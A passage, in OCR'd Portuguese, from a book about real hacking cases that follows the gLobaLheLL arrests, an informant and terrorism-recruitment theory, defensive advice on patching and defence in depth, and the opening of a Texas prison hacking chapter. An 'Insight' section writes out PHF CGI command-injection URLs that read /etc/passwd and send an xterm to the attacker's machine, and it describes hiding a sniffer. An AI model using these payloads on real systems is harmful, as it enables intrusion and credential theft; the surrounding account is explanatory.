invasoes recentes e perguntando a Zyklon se ele tinha alguma aventura recente para lhe contar "Entao eu disse 
que estavamos no site Web da Casa Branca", contou Zyklon. 

Algumas horas depois daquela conversa, Zyklon me disse que eles viram um sniffer aparecer no site — um 
administrador de sistema estava de olho para ver o que estava acontecendo, ao mesmo tempo em que tentava 
rastrear quem eram as pessoas no site. Apenas coincidencia? Ou ele tinha razao para ter aquela suspeita naquele 
determinado momento? Passaram-se meses ate que Zyklon descobrisse a resposta. Naquele momento, assim que 
identificaram o sniffer, os meninos puxaram o plugue e sairam do site, esperando ter pego o administrador antes 
que ele os pegasse. 

Mas eles tinham colocado o dedo num vespeiro- Por volta de duas semanas mais tarde o FBI comeęou a agir, 
cercando cada integrante da gLobaLheLL que tinha conseguido identificar, Alem de Zyklon, entao com 19 anos. 
preso no estado de Washington, eles tambem pegaram MostHateD (Patrick Gregory, tambem com 19 anos, do 
Texas) e MindPhasr (Chad Davis, Wisconsin), junta-mente com outros. 

neOh estava entre os poucos que sobreviveram a 'limpeza'. De seu local distante, seguro, ele estava enfurecido 
e divulgou uma pagina 'desfigurada' no site Web com uma mensagem de desafio. 

Conforme editado para o horario nobre, dizia: "Ouęam, FBI, seus f_ da p_. Nao f_am 

nossos integrantes, voces vao sair perdendo. Estamos segurando o fbi.gov enquanto eu digito esta mensagem. E 
VOCES ESTAO COM MEDO. Fomos presos porque voces, seus estupidos, nao conseguem imaginar quem 
invadiu a Casa Branca, certo? Entao voces prendem todos nós para ver 

se alguem vai dedurar. BOA SORTE, SEUS F_ DA P_. NAO VAMOS DEDURAR. Voces 

nao entendem? EU DISSE DOMINAęAO MUNDIAL". 

E ele assinou: "O impiedoso, ne0h",(9) 

Conseqiiencias 

Como aquele administrador de sistema estava sniffing tao cedo, logo de manha? Zyklon nao tern a menor 
duvida da resposta. Quando os promotores tiraram os documentos de sua pasta, ele descobriu uma declaraęao de 
que as informaęoes que levaram ao conhecimento da invasao do gLobaLheLL no site da Casa Branca tinham sido 
fomecidas por um informante do FBI. Ele lembra que o documento tambem relatava que o informante estava em 
Nova Deli, India, 

Na opiniao de Zyklon, nao ha duvida. A unica pessoa a quem ele tinha contado sobre a invasao da Casa 
Branca — a unica pessoa — tinha sido Khalid Ibrahim. Um mais um. dois: Khalid era informante do FBI. 

Mas o misterio continua. Mesmo que Zyklon estivesse certo, aquela seria a historia toda? Khalid era um 
informante que ajudava o FBI a localizar garotos hackers dispostos a conduzir invasoes em sites vulneraveis? Ou 
ha outra explicaęao possivel: que o papel dele como informante era apenas parte da historia e ele, na verdade, 
tambem era o terrorista paquistanes que o generał indiano acreditava 
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que fosse? Um homem com dois papeis, ajudando a causa do Taliba enąuanto estava infiltrado no FBI. 

Certamente, o medo dele de que um dos garotos o delatasse ao FBI se encaixa nessa versao da historia. 

Somente algumas pessoas sabem a verdade, A pergunta e se os agentes do FBI e os promotores federais 
estavam entre aqueles que conhecem a historia real. Ou eles tambem estavam sendo enganados? 

No firn, Patrick Gregory e Chad Davis foram condenados a 26 meses, e Zyklon Burns pegou 15 meses. Todos 
os tres terminaram de cumprir pena e foram soltos. 

Cinco anos depois 

Hoje em dia, hacking e apenas urna lembranęa para Comrade, mas a voz dele se toma mais animada quando 
ele fala do "suspensę de fazer urna merda que nao deveria estar fazendo, ir a lugares aonde nao deveria ir 
esperando encontrar alguma coisa legał". 

Mas e hora de tomar um rumo na vida. Ele diz que esta pensando em fazer faculdade. Quando conversamos, 
tinha acabado de voltar da escola militar de Israel. A lingua nao foi um problema — ele tinha aprendido hebraico 
na escola e, de fato, ficou surpreso de ver como se lembrava bem dela. 

As impressoes que ele tern do pais sao misturadas. As meninas eram "realmente legais", e os israelenses 
demonstravam gostar muito dos Estados Unidos. "Eles parecem admirar os americanos." Por exemplo, ele estava 
com alguns israelenses que estavam tomando um refrigerante do qual ele nunca ouviu falar, chamado RC Cola, 
um produto norte-americano. Os israelenses explicaram: Nos comerciais, e isto o que os americanos tomam". Ele 
tambem encontrou "urna atmosfera anti-americana entre pessoas que nao concordavam com a politica", mas a 
aceitavam: "Acho que isso acontece em qualquer lugar". 

Ele odiou o clima — "frio e chuvoso" enquanto estava la. E ainda havia a questao do computa-dor. Ele tinha 
comprado um laptop sem fio, especialmente para a viagem, mas descobriu que "os edificios sao construidos com 
paredes muito grossas". O computador dele podia ver de cinco a dez redes, mas os sinais eram fracos demais, e ele 
tinha de andar 20 minutos ate um lugar onde pudesse se conectar a Internet. 

Entao, Comrade esta de volta a Miami. Adolescente e com um crime grave registrado em sua folha de 
antecedentes criminais, agora ele esta vivendo de sua heranęa, tentando decidir se vai fazer faculdade ou nao. Tern 
20 anos e nao faz muita coisa na vida. 

O velho companheiro de Comrade, neOh, trabalha para urna importante empresa de telecomunicaęoes (um 
emprego em periodo integral; "nao e bom", diz ele), mas logo vai para Los Angeles passar tres meses em um 
emprego que envolve trabalho braęal e que ele aceitou porque o salario e muito mais alto do que o que esta 
recebendo atualmente. Agora que faz parte da sociedade, ele espera ganhar o suficiente para dar entrada numa 
casa na comunidade onde vive. 

Quando o periodo de tres meses de trabalho exaustivo mas bem remunerado chegar ao firn, neOh tambem fala 
em comeęar urna faculdade — mas nao em estudar ciencia da computaęao. "A maioria das pessoas que conheci 
com diploma em ciencia da computaęao conhece essa merda toda", 
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diz ele. Em vez disso, ele gostaria de se formar em administraęao e em gestao organizacional e entrar na area de 
computaęao num nivel empresarial. 

Conversar sobre suas antigas aventuras lhe traz novamente a fixaęao em Kevin. Em que medida ele se 
imaginou em meu lugar? 

Eu queria ser pego? Queria e nao queria. Ser pego mostra: "Eu posso fazer isso, e fiz". Nao que eu 

quisesse ser pego de propósito. Queria ser pego. lutaria e seria solto, seria o hacker que se safou. 

Sairia, conseguiria um bom emprego, seguro, numa agencia do governo, e me entrosaria com o 

submundo. 

A ameaęa e grandę? 

A uniao de determinados terroristas e garotos hackers destemidos poderia ser desastrosa para os Estados 
Unidos. Esse episódio me fez pensar em ąuantos outros Khalids estao por ai recrutando garotos (ou mesmo 
adultos nao-patriotas com habilidades de hacking) e que tern sede de dinheiro, reconhecimento pessoal ou 
satisfaęao de realizar com sucesso tarefas dificeis- Os recrutadores de Khalid podem ser bem mais discretos e 
dificeis de identificar. 

Quando eu estava na prisao, antes do julgamento, enfrentando acusaęoes relacionadas a hacking, fui abordado 
varias vezes por um chefe do narcotrafico colombiano. Ele estava no presidio federal, sem chance de liberdade 
condicional, e me ofereceu um acordo tentador: eu receberia cinco milhoes de dólares em dinheiro para invadir o 
"Sentry" — o sistema de computaęao do Federal Bureau of Prisons (Departamento Federal de Penitenciarias) e 
libera-lo da custódia. Ele falava serio. Nao aceitei a oferta, mas dei a impressao de que iria ajuda-lo a sair, para 
evitar qualquer confronto. Imagino o que neOh teria feito numa situaęao dessas. 

Nossos inimigos podem muito bem estar treinando seus soldados na arte da guerra cibemetica para atacar 
nossa infra-estrutura e defender a deles. Parece urna bobagem pensar que esses grupos tambem recrutariam 
hackers de qualquer lugar do mundo para projetos de treinamento e missoes perigosas. 

Em 1997 e novamente em 2003, o Departamento de Defesa lanęou o Operation Eligible Receiver — um 
esforęo para testar a vulnerabilidade dos Estados Unidos a ataques eletrónicos. De acordo com um relato 
publicado no Washington Times 10 sobre esses primeiros esforęos, "Autoridades do Pentagono fi caratu assustadas 
com um exercicio militar que mostrava como e facil para os hackers suprimir funęoes de redes de computador 
civis e militares dos Estados Unidos". O artigo explica ainda que a National Security Agency reuniu um grupo de 
especialistas em computadores como urna 'equipe yermelha de hackers que pudesse usar apenas equipamentos de 
computador, disponiveis ao publico e qualquer ferramenta de hacking, inclusive explorar códigos, para fazer 
download da Internet ou de boletins eletrónicos. 

Em alguns dias, a equipe vermelha de hackers infiltrou-se em partes de controle de sistemas de computador da 
rede de energia eletrica federal e com urna serie de comandos deixou partes do pais no escuro. "Se o exercicio 
tivesse sido real", de acordo com Christian Science Monitor 11 , "eles pode-riam ter estragado os sistemas de 
comunicaęao do Departamento de Defesa (tirando a maior parte do Comando Pacifico) e ter tido acesso a sistemas 
de computador em embarcaęoes da Marinha norte-americana." 
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Por experiencia própria, fui capaz de derrotar mecanismos de seguranęa usados por inumeras Baby Bells* 
para controlar o acesso a comutadores de telefone. Uma decada atras, eu tinha controle total sobre a maioria dos 
switches/comutadores gerenciados pela Pacific Bell, Sprint, GTE e outros. Imagine o caos que um grupo de 
terroristas engenhosos poderia ter gerado com o mesmo nivel de acesso. 

Ha registros de que os membros da Al Qaeda e outros grupos terroristas costumam usar redes de computador 
em atos de pianejamento terrorista. As evidencias sugerem que os terroristas usaram a Internet para pianejar suas 
operaęoes para os ataques de 11 de setembro. 

Se Khalid Ibrahim tivesse conseguido obter informaęoes de qualquer um dos jovens hackers, ninguem saberia 
disso. Faltam provas para afirmar que ele estaria realmente ligado aos ataques ao World Trade Center e ao 
Pentagono. No entanto, ninguem sabe quando ele ou um sujeito como ele vai aparecer novamente na cena 
ciberespacial tentando arranjar ajudantes ingenuos que possam se sentir empolgados em "fazer uma droga que nao 
deveriam estar fazendo, ir a lugares aonde nao deveriam ir". Garotos que poderiam pensar que o desafio que lhes 
estao oferecendo e 'legał'. 

Para jovens hackers, a seguranęa fraca continua sendo um convite. No entanto, os hackers desta historia 
deveriam ter reconhecido o perigo de um estrangeiro recruta-los para comprometer redes de computador norte- 
americanas suscetiveis. Imagino quantos outros neOhs tern sido recrutados por nossos inimigos. 

A boa seguranęa nunca foi tao importante em um mundo habitado por terroristas. 

Insight 

neOh nos fomeceu detalhes sobre como invadiu os sistemas de computador da Lockheed Martin. A historia e 
tanto um testemunho da inovaęao de hackers ("Se ha uma falha na seguranęa, vamos encontra-la" — esse poderia 
ser o lema do hacker) como uma historia que serve de advertencia para toda organizaęao. 

Ele concluiu rapidamente que a Lockheed Martin estava usando seu próprio Domain Name Servers. O DNS e 
o protocolo da Internet que, por exemplo, traduz ('resolve') www.disney.com em 198.187.189.55, um endereęo 
que pode ser usado para rotear pacotes de mensagem. neOh sabia que um grupo de pesquisa de seguranęa na 
Polonia tinha publicado o que os hackers chamam de exploit — um programa projetado especificamente para 
atacar determinada yulnerabilidade — para tirar yantagem de uma yulnerabilidade na versao do DNS que a 
Lockheed estava usando. 

A empresa estava usando uma complementaęao dos protocolos DNS chamada Bind (Bekerley Internet Name 
Domain). O grupo polones tinha descoberto que uma versao do Bind era suscetivel a um tipo de ataque que 
envolvia um buffer overflow remoto**, e aquela versao era a que estava sendo usada na Lockheed Martin. 
Seguindo o metodo que descobriu on-line, neOh conseguiu priyilegios root (administrativos) tanto nos seryidores 
DNS primario quanto secundario da Lockheed. 

* Nos Estados Unidos, alem das grandes corporaęoes que atuam no segmento da telefonia, existem as Baby Bells, 
empresas regionais que exploram nichos especificos, como. por exemplo, o dos cartoes pre-pagos (N. da T.). 

** Ocorre quando o programa recebe mais dados do que esta preparado para armazenar no buffer (N. da R. T.). 
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Depois de ganhar root, neOh comeęou a interceptar senhas e e-mails instalando um programa sniffer, que age 
como um grampo de computador Qualquer trafego que esteja sendo enviado pelo fio e captado secretamente; em 
geral o hacker manda os dados a serem armazenados num local onde e improvavel que sejam notados. Para 
esconder o sniffer, diz neOh, ele criou um diretório com um nome que era simplesmente um espaęo representado 
por tres pontos; a trajetória real que ele usou era 7var/adm/...". Depois de urna breve inspeęao, um administrador 
de sistema poderia supervisionar esse item inócuo. 

Essa tecnica de esconder o programa sniffer, embora efetiva em muitas situaęoes, e bem simples; existem 
metodos muito mais sofisticados para encobrir os rastros de um hacker numa situaęao como essa. 

Antes de descobrir se ele seria capaz de penetrar ainda mais na rede Lockheed Martin para obter informaęoes 
confidenciais da empresa, neOh voltou sua atenęao para outra tarefa. Os arquivos sensiveis de Lockheed Martin 
continuaram seguros. 

Para o hack da Casa Branca, Zyklon diz que ele inicialmente usou um programa chamado Scanner CGI 
(Common Gateway Interface), que escaneia o sistema-alvo para vulnerabilidades do CGI. Ele descobriu que o 
site Web era suscetivel a ataque usando o PHL exploit, que tira vantagem de um erro do programador cometido 
pelo projetista do script do PHL (lista telefónica). 

O PHL e um arquivo de interface baseado em formulario que aceita um nome como entrada e procura 
informaęoes como nome e endereęo no servidor. O script chamava urna funęao escape_shell_cmd(), que deveria 
sanitizar a entrada para qualquer caractere especial. Mas o programador tinha dekado um caractere de fora de sua 
lista, o newline. Um bom atacante poderia tirar vantagem dessa falha fomecendo entrada no formulario que 
incluia a versao criptografada (0X0a) do caractere newline. Isso engana o script, fazendo-o executar qualquer 
comando que o atacante escolha. 

Zyklon digitou este URL em seu browser: 

http:// www.whitehouse.qov/cqi- b i n/p hf? Pali as=x%Oa/b i n/ 
cat%20/etc/passwd 

Com isso, conseguiu exibir o arquivo da senha para whitehouse.gov. Mas ele queria ganhar pleno controle do 
servidor da Casa Branca na rede- Sabia que era bastante provavel que as portas do servidor X fossem bloqueadas 
pelo firewall, o que o impediria de se conectar a qualquer um daqueles servięos no whitehouse.gov . Entao, em vez 
disso, explorou novamente o buraco PHL digitando 

http: //www.whitehouse.gov/cgi-bin/phf ?Qalias=x%Oa/usr/ 
XllR6/bin/xterm%20-ut%20-display%20zyklons.ip.address:O.O 

Isso fez com que um termo x fosse enviado do servidor da Casa Branca para um computador sob o controle 
dele, dirigindo um servidor X. Ou seja, em vez de se conectar a whitehouse.gov, com efeito ele estava 
comandando o sistema da Casa Branca para conectar-se a ele. (Isso só e possivel quando o firewall permite 
conexoes extemas, O que aparentemente e o caso aqui.) 
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Entao ele explorou uma vulnerabilidade ao buffer overflow no programa do sistema — ufsrestore. E isso, diz 
Zyklon, permitiu-lhe ganhar o root do whitehouse.gov , bem como acesso ao mail server da Casa Branca e a outros 
sistemas na rede. 

Medidas preventivas 

As aventuras de neOh e Comrade descritas aqui levantam duas ąuestoes para todas as empresas. 

A primeira e simples e familiar: mantenba-se atualizado com todos os ultimos sistemas operacionais e 
releases de aplicaęao de seus revendedores. E essencial exercer vigilancia ao acompanhar e instalar quaisquer 
patches ou correęoes relacionadas a seguranęa. Para certificar-se de que isso nao seja feito de uma forma 
acidental, todas as empresas deveriam desenvolver e implementar um programa gerencial de patch com o objetivo 
de alertar as pessoas que trabalham nesse segmento sempre que um novo patch for editado em produtos que a 
empresa usa, em particular software de sistema operacional, mas tambem software de aplicaęao e firmware. 

E, quando um novo patch tomar-se disponivel, ele deve ser instalado assim que possivel — imediatamente, a 
nao ser que isso atrapalhe as operaęoes corporativas, ou o mais rapido possivel Nao e dificil entender por que 
funcionarios sobrecarregados de trabalho cedem a pressao para se concentrar nos projetos que tern muita urgencia 
(instalar sistemas para novos funcionarios, só para dar um exemplo) e instalam patches só quando tern tempo. 
Mas, se o dispositivo unpatched for acessivel pela Internet, isso pode criar uma situaęao muito arriscada, 

Inumeros sistemas sao comprometidos devido a falta de gerenciamento do patch. Uma vez que a 
vulnerabilidade e revelada, a janela de exposięao aumenta significativamente ate que o fomecedor tenha liberado 
um patch que corrija o problema e os clientes o tenham instalado. 

Sua organizaęao precisa fazer da instalaęao de patches uma prioridade, com um processo formal de gestao de 
patches que reduza a janela de exposięao o mais rapido possivel, alem de nao interferir em operaęoes criticas da 
empresa. 

Mas nao basta estar atento a instalaęao de patches. neOh diz que algumas das invasoes de que ele participou 
foram realizadas com o uso de exploits 'dia-zero' — uma invasao baseada numa vulnerabilidade que nao e 
conhecida a nao ser por um grupo muito pequeno de hackers. 'Dia-zero' e o dia em que eles exploram a 
vulnerabilidade pela primeira vez e, por isso, o dia em que o fornecedor e a comunidade de seguranęa tomam 
ciencia dele pela primeira vez. 

Como sempre ha um potencial a ser comprometido por um exploit "dia-zero", toda organizaęao que usa o 
produto falho e vulneravel, ate que um patch ou uma forma de contomar o problema apareęa. Logo, como voce 
atenua o risco dessa exposięao? 

Acredito que a unica soluęao viavel consiste em usar um modelo de defesa profunda. Devemos supor que 
nossos sistemas de computador acessiveis publicamente serao vulneraveis a um ataque 'dia-zero' em algum 
momento. Assim, deveriamos criar um ambiente que minimizasse o prejuizo potencial que um hacker pode 
provocar. Um exemplo mencionado antes e colocar sistemas acessiveis publicamente no 'DMZ' do firewall da 
empresa. O termo DMZ, emprestado da abreviaęao militar/politica com o significado de 'zona desmilitarizada', 
refere-se a montar uma arquitetura de rede de modo que os sistemas a que o publico precisa ter acesso (servidores 
Web, servidores de cor-reio eletrónico, servidores DNS e outros) estejam isolados de sistemas sensiveis na rede 
corporativa. 
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Empregar uma arąuitetura de rede que proteja a rede interna e um exemplo de 'defesa profimda'. Com esse 
recurso, mesmo que os hackers descubram uma vulnerabilidade antes desconhecida e um servidor da rede ou do 
correio eletrónico esteja comprometido, os sistemas corporativos na rede interna ainda estao protegidos por outro 
nivel de seguranęa. 

As empresas podem organizar outra medida preventiva eficiente monitorando provedores individuais ou de 
rede para uma atividade que pareęa incomum ou suspeita. Um atacante geralmente realiza certas aęoes ao 
conseguir comprometer um sistema, como tentar obter senhas criptografadas ou senhas plaintext* instalando uma 
back door, modificando arquivos de configuraęao para enfraquecer a seguranęa ou alterando o sistema, a 
aplicaęao ou arquivos log, entre outros esforęos. Ter um processo que monitore esses tipos de comportamento 
tipico de hacker e alerte o Staff adequado para tais eventos pode ajudar no controle de danos. 

Fui entrevistado inumeras vezes pela imprensa para falar sobre as melhores maneiras de proteger seu negócio 
e os recursos de seu computador pessoal no ambiente hostii de hoje. Uma de minhas recomendaęoes basicas e 
usar uma forma mais eficaz de autenticaęao do que senhas estaticas. Voce nunca sabera, a nao ser, talvez, depois 
da ocorrencia, quando alguem descobrir sua senha, 

Inumeras tecnicas de sign-on de segundo nivel estao disponiveis para serem usadas em combinaęao com uma 
senha tradicional, para fornecer uma seguranęa muito maior, Alem do SecurelD da RSA, mencionado no sub item 
A invasao na Casa Branca, a SafeWord PremierAccess oferece tokens especiais que geram passcode, certificados 
digitais, cartoes inteligentes, biometrica e outras tecnicas. 

As desvantagens de usar esses tipos de controles de autenticaęao sao o custo agregado e o nivel extra de 
inconveniencia para cada usuario. Tudo depende do que voce esta tentando proteger. Senhas estaticas podem ser 
suficientes para o site Web LA Times para proteger seus novos artigos. Mas voce contaria com senhas estaticas 
para proteger as ultimas especificaęoes de design para um novo jato comercial? 

O resultado 

As histórias contadas neste livro, e tambem na imprensa, demonstram a falta de seguranęa dos sistemas de 
computador dos Estados Unidos e quanto somos vulneraveis a um ataque. Parece que poucos sistemas sao 
realmente seguros. 

Nesta era de terrorismo, precisamos remendar melhor os furos. Episódios como os recontados aqui levantam 
uma questao que precisamos enfrentar: com que facilidade os talentos e o conhecimento de nossos adolescentes 
desavisados sobre o que esta acontecendo podem se voltar contra nós e pór nossa sociedade em perigo? Acredito 
que os garotos da escola devam aprender os principios da etica em computaęao ja nas aulas de informatica do 
ensino basico. 

Recentemente, fui a uma apresentaęao de Frank Abagnale, o protagonista do filme Prenda-me se for capaz. 
Frank tinha feito uma pesquisa com alunos em todo o pais sobre o uso etico de computadores. Perguntou-se a cada 
aluno se considerava um comportamento aceitavel penetrar na senha 


Informaęao nao encriptada que e enviada de uma pessoa (ou organizaęao) a outra e chamada de 'texto puro' (N.da R.T). 
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de um amigo. Surpreendentemente, 48 por cento dos estudantes entrevistados nao viam problema nisso- Com 
atitudes como essa, nao e dificil entender por que as pessoas se envolvem nesse tipo de atividade. 

Se alguem tiver uma sugestao de como fazer jovens hackers tomarem-se menos suscetiveis a serem 
recrutados por nossos inimigos estrangeiros ou locais, gostaria que essas ideias fossem expostas e dmdgadas. 

Notas 

1. "Do Terrorists Troll the Net?", de Niall McKay, Wired.com, 14/11/98. 

2. Artigo de McKay. op. cit. 

3. Artigo de McKay, op. cit. 

4. Do site Web satp.org, South Asia Intelligence Review. 

5. "The United States and the Global Coalition Against Terrorism, September-December 2001: A Chronology". 
http:/ www.state.q ov/r/pa/ho/pubs/fs/5889.htm. 

6. Major General Yashwant Deva, Avsm (Retd), Presidente lete, em "Information Security" em India International 
Centre, Nova Deli. em 6.4.2002. p. 9. 

7. E dificil confirmar isso. Como esse ataque aconteceu durante a administraęao Clinton, nenhuma das pessoas 
citadas estaria trabalhando mais na Casa Branca. Mas algumas informaęoes interessantes estao disponiveis. 
Monty Haymes fez uma gravaęao em video. Christopher Adams e o nome de um reporter do Financial Times, 
um jornal ingles; ate onde sabemos, nao ha nenhum funcionario da Casa Branca com esse nome. Debra Reid 
e fotografa da Associated Press. Ninguem chamado Connie Colabatistto parece ter trabalhado na Casa 
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8. http// www.attrition.orq/mirror/attritiorViqQq/OS/IO/www.whitehouse.qov/mirror.html . 

9. Tambem e dificil verificar isso. Entretanto, o texto citado pode ser visto em http://www.attrition.org/mirror/ 
attritiorV1999/05/26/mmic.snu.ac.kr/. 

10. "Computer Hackers Could Disable Military; System Compromised in Secret Exercise", de Bill Gertz, 
Washington Times. 16.4.1998. 

"Wars of the futurę... today", de Tom Regan, Christian Science Monitor. 34.6.1999. 
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Acho que nao existe uma coisa que se possa dizer aos jovens para faze-los mudar, a 
nao ser que tenham yalores, sabe, e nunca sigam o caminho mais facil. 

William 


Dois jovens condenados, cada um cumprindo longa pena por assassinato, encontram-se num dia muito ąuente 
no patio de concreto de uma prisao do Texas e descobrem que tem o mesmo fascinio por computadores. Eles se 
unem e, em segredo, se tornam hackers, bem no nariz dos guardas vigilantes. 

Tudo isso acabou. Hoje em dia, William Butler entra em seu carro as cinco e meia toda manha e vai para o 
trabalho, atravessando o congestionamento de Houston. Ele se considera um homem de muita sorte ate mesmo 
por estar vivo. Tem namorada, dirige um carro novo e conta; "Recentemente recebi um aumento de sete mil 
dólares. Nada mau". 

Como William, seu amigo Danny tambem se acertou na vida e tem emprego fixo, trabalhando em 
computaęao. Mas nenhum deles se esąuecera dos longos e demorados anos em que pagaram um preęo alto pelo 
que fizeram. Estranhamente, durante o tempo em que ficaram na prisao adquiriram habilidades que agora eles 
utilizam no 'mundo livre. 


La dentro: descobrindo os computadores 

O presidio e um choque para o recem-chegado. Os novos detentos ficam frequentemente amontoados ate que 
aquele que desobedece as regras e mostra-se violento e excluido do grupo — um serio desafio aos que tentam 
viver de acordo com as regras. Cercados por pessoas que poderiam explodir 
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diante de qualquer desafio, mesmo os mais tranquilos tern de se mostrar duroes e se defender. William 
estabeleceu as próprias regras. 

Basicamente, vivi do Jeito que tinha de se viver la. Tenho 1,78 metro e uns 116 quilos. Mas a 
questao nao cara essa, e sim de mentalidade: eu nao era um fraco e ninguem se aproveitaria de 
mim. Eu me portava assim. La dentro, se alguem percebesse qualquer fraqueza, se aproveitava 
disso. Eu nao mentia, nao conversava sobre coisas dos outros, e nao me pergunte sobre assuntos 
meus porque vou mandar voce se ferrar. 

Danny e eu cumprimos pena em unidades duras. Voce sabe o que estou dizendo — unidades de 
gladiadores, onde voce tinha de brigar o tempo todo. Entao, nao davamos a minima para os 
guardas nem para ninguem. Brigavamos por qualquer motivo ou por tudo o que tivessemos de 
fazer. 

Danny ja cumpria uma pena de vinte anos na unidade Wynne, uma prisao em Huntsville, Texas, quando 
William chegou. O motivo de sua prisao nao tinha nada a ver com computadores. 

Primeiro eles me mandaram para uma unidade onde se comeęa trabalhando no campo, nas 
fazendas, Voce anda com a enxada para cima e papa baixo, formando Oleiras para o plantio. Eles 
podiam usar maquinas para fazer aquilo, mas nao — e um modo de punięao, para voce se sentir 
melhor com qualquer trabalho que lhe derem mais tarde. 

Quando Danny foi transferido para a unidade Wynne, ficou grato por ter recebido um trabalho administrativo 
no Escritório de Transportes. "Comecei a trabalhar com uma maquina de escrever 01ivetti com um monitor e 
alguns discos rigidos. Ela executava o DOS e tinha uma memória pequena. Eu mexia, tentando aprender a usa-la." 
(Para mim, aquilo parecia familiar: o primeiro computador que usei era um teletipo 01ivetti com um modem 
acousticcoupler 110-baud.) 

No escritório ele descobriu um livro antigo de computaęao, um manuał de instruęoes para o programa dBase 
III, de banco de dados. "Imaginei como colocar os relatórios no dBase, enquanto todos ainda estavam 
datilografando os deles." Ele converteu os pedidos de compra do escritório para dBase e ate iniciou um programa 
para acompanhar as expedięoes de produtos agricolas da prisao para outros presidios do estado. 

Danny acabou assumindo a fimęao de fiduciario, que envolvia um nivel mais alto de confianęa e era 
considerada um 'passe de saida', porque lhe permitia trabalhar fora do perimetro de seguranęa da prisao. Depois 
foi trabalhar num trailer de despachante fora do presidio, preparando pedidos de expedięao para caminhóes que 
transportavam alimentos. Mas o que importava realmente era que isso possibilitou "meu primeiro acesso real a 
computadores". 

Depois de um tempo, ele ganhou uma pequena sala no trailer e foi encarregado do hardware — montava 
maquinas novas e consertava as quebradas. Era uma oportunidade de ouro: aprender a montar computadores e a 
conserta-los. Algumas das pessoas com quem ele trabalhava lhe traziam livros sobre computaęao, o que acelerou 
sua aprendizagem. 

m 



Capitulo 3 A irwasao na prisao do Texas 


O fato de ser encarregado do hardware permitiu-lhe acesso a "uma prateleira cheia de peęas de computador, 
onde nada era inventariado". Logo ele passou a montar maąuinas ou a acrescentar componentes a elas com 
razoavel habilidade. O pessoal do presidio nem inspecionava os sistemas para verificar como ele os tinha 
configurado, o que lhe permitia instalar maąuinas facilmente, com eąuipamento nao-autorizado. 

As prisoes federais sao diferentes 

Esse tipo de negligencia ou descaso pelo que um detento e capaz de fazer dificilmente acontece numa prisao 
federal O U. S. Bureau of Prisons e bem paranóico com relaęao ao assunto. Durante o tempo em que cumpri pena, 
tinha uma atribuięao "SEM COMPUTADOR", o que significava que meu acesso a qualquer computador era 
considerado uma ameaęa a seguranęa — e o mesmo valia para o telefone, pela seguinte razao: um promotor disse, 
certa vez, a um juiz federal que se eu pudesse usar um telefone enąuanto estivesse sob custódia seria capaz de 
assoviar nele e enviar instruęoes para um missil intercontinental da Foręa Aerea. Absurdo, mas o juiz nao tinha 
razao para nao acreditar nisso. Fiquei na solitaria durante oito meses. 

Naąuela epoca, no sistema federal, os prisioneiros só tinham acesso a computador sob condięoes estritas. 
Nenhum detento podia usar qualquer computador que estivesse ligado a um modem ou que tivesse um cartao de 
rede ou outro dispositivo de comunicaęao. Computadores e sistemas operacionalmente perigosos, que continham 
informaęoes delicadas, eram claramente marcados com os dizeres "Uso exclusivo de funcionarios", para deixar 
claro que nenhum detento deveria usar um computador que colocasse a seguranęa em risco. O hardware era 
estritamente controlado por funcionarios que entendiam de tecnologia, para impedir o uso nao autorizado. 

William ganha a chave do castelo 

Quando William foi transferido do presidio agricola para a unidade Wynne, em Huntsville, passou a fazer um 
trabalho invejavel na cozinha. "Eu ganhei as chaves do castelo, porque podia trocar alimento por outras coisas," 

A cozinha tinha um computador, uma maąuina antiga 286 com um yentilador para resfriamento na frente, mas 
que ainda estava em bom estado, e ele podia desenvolver suas habilidades em informatica. William conseguiu 
inserir alguns registros, relatórios e formularios de pedidos de compra da cozinha no computador, o que lhe 
poupava horas de trabalho, porque nao precisava acrescentar colunas de numeros nem digitar toda aąuela 
papelada burocratica. 

William descobriu que havia outro detento que compartilhava de seu interesse por computadores, Danny, que 
conseguiu aprimorar o computador que estava no armazem de abastecimento. Ele tirava componentes da 
prateleira do trailer de Agricultura e solicitava a ajuda de alguns amigos da manutenęao que podiam transitar por 
qualquer lugar dentro do presidio. 

Eles nao davam satisfaęóes a ninguem. Levavam peęas de computador para a cozinha, para nós. Só 

as colocayam num carrinho e levavam para a gente. 
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Entao, numa yespera de Natal, um guarda entrou na unidade com uma caixa que tinha 
basicamente peęas de um computador inteiro, uma central (hub) e outras coisas. 

Como ele convenceu um guarda a violar as regras de modo tao descarado? "Eu fiz o que eles chamam de 
'passar uma conversa nele' — conversei com ele e me fiz de amigo." Os pais de William tinham comprado os itens 
de computador que lhes pedira, e o guarda concordou em leva-los para ele como se fossem presentes de Natal. 

Para ganhar espaęo para a instalaęao que se expandia, William adaptou uma pequena sala de armazenagem 
ligada ao armazem de abastecimento. A sala nao tinha ventilaęao, mas ele estava certo de que isso nao seria 
problema — e nao foi: "Eu negociei comida para ter ar-condicionado, fizemos um buraco na parede e o 
colocamos nela para podermos respirar e trabalhar com conforto", explicou. 

"Constnumos tres PCs la. Pegamos caixas velhas de 286 e colocamos placas de Pentium nelas. Os discos 
rigidos nao encaixavam, entao tivemos de usar rolos de papel higienico para segura-los. Foi uma soluęao criativa, 
mas era engraęado de ver." 

Por que tres computadores? Danny aparecia de vez em quando, e cada um deles tinha um computador para 
usar. E um terceiro sujeito 'abriu', mais tarde, 'um escritório de advocacia', cobrando dos detentos para fazer 
pesquisas sobre questoes juridicas on-line e elaborando documentos para preencher pedidos de apelaęao e coisas 
do genero. 

Enquanto isso, as habilidades de William para organizar a documentaęao do armazem de abastecimento no 
computador chamaram a atenęao do chefe encarregado do servięo de alimentaęao. Ele deu a William mais uma 
atribuięao: quando nao estivesse ocupado com as tarefas regulares, ele deveria criar arquivos no computador para 
os relatórios do capitao que iriam para a diretoria do presldio. 

Para fazer isso, William podia trabalhar no escritório do chefe, uma incumbencia prazerosa para um 
prisioneiro. Mas, depois de um tempo, ele comeęou a se irritar: aqueles computadores do armazem de 
abastecimento estavam carregados com arquivos de musica, jogos e videos. No escritório do chefe, ele nao tinha 
aquelas diversoes prazerosas. Com sua velha e boa capacidade de inovaęao, somada a uma dose adequada de 
coragem e audacia, William encontrou uma maneira de resolver o problema. 

Troquei comida da cozinha por um cabo de rede da manutenęao. O funcionario da manutenęao fez 
o pedido de uma bobina de 300 metros de cabo de Cat 5 [Ethernet]. Conseguimos que os guardas 
abrissem canaletas e passassem o cabo. Eu só lhes disse que estava fazendo um trabalho para o 
Capitao e que eles poderiam abrir a porta. 

Ele fez a conexao de Ethernet rapidamente, ligando os tres computadores do armazem de abastecimento com 
o computador do escritório do capitao. Quando o capitao nao estava la, William distrala-se brincando com seus 
jogos, ouvindo musica e assistindo a videos. 

